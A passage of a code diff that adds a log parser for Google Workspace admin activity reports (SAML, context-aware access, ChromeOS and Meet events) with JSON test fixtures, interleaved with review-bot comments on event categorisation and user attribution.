%}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: 
'{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% 
endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json 
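Review bot: `set_chrome_fields` assigns `event.category: ["web"]` to every chrome event, including `CHROME_OS_LOGIN_EVENT` and `CHROME_OS_LOGOUT_EVENT`, which are session logins and logouts; rules and dashboards keyed on `event.category: authentication` (the category `set_saml_fields` uses for its logins) will not see them, and `event.type: ["connection"]` is not a type ECS pairs with the web category. Moving the category into the login/logout `set` as `event.category: ["authentication"]` with `event.type: ["start"]` / `["end"]` would align the two stages. Separately, `set_context_aware_fields` sets `event.type: ["denied"]` unconditionally, whereas the saml and chrome stages filter on `events[0].name`; a filter on the event name (the sample shows `MONITOR_MODE_ACCESS_DENY_EVENT`) would keep non-deny context-aware events from being tagged as denied.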
@@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is 
admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..6567eebf1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
@@ -0,0 +1,53 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..990b7f47c --- /dev/null 
+++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -0,0 +1,46 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json 
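Review bot: The expected `event.category` for this `CHROME_OS_LOGIN_EVENT` (reason `CHROMEOS_KIOSK_SESSION_LOGIN`) is `["web"]` with `event.type: ["connection"]`, which keeps a device logon out of any authentication-scoped detection; the SAML login fixtures in the same change pin `"authentication"`. Unless the parser deliberately treats every `chrome` application event as web traffic, this fixture should pin `"category": ["authentication"]` and `"type": ["start"]` for the login reason so a rule keyed on `event.category:authentication` also sees kiosk and user sessions on managed ChromeOS devices. `DEVICE_USER` is `-` here, so the only identity is the actor `profileId` surfaced as `user.id`; that limitation is worth a comment in the parser rather than in the fixture.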
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Pari
s\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",
\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file 
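Review bot: `user.email` in the expected block is taken from the `organizer_email` parameter, while the actor of this `call_ended` event is `callerType: KEY` / `HANGOUTS_EXTERNAL_OR_ANONYMOUS`, i.e. an external or anonymous participant. Pinning the organizer as `user.email` attributes the participant's `source.ip: 1.2.3.4` and geo to the organizer's account, which is the wrong identity for any rule that correlates user and IP. Prefer keeping the organizer under a dedicated key such as `google.report.meet.organizer_email` and leaving `user.*` unset when the actor is not a user; this depends on how the parser resolves `actor`, which is not in this diff. Separately, `1.2.3.4` is a routable address, so an RFC 5737 value like `203.0.113.4` would be safer in a fixture that enrichment steps may run against.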
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json 
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\"
:\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\"